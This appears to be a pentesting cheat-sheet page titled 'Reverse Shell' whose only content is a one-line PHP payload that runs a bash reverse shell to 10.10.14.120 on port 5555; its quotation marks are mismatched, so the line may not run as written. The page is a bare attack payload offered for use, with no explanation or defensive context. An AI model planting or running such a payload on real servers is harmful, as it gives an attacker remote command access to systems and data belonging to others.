Reverse Shell

<?php shell_exec('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.120/5555 0>&1'"); ?>

Last updated

Was this helpful?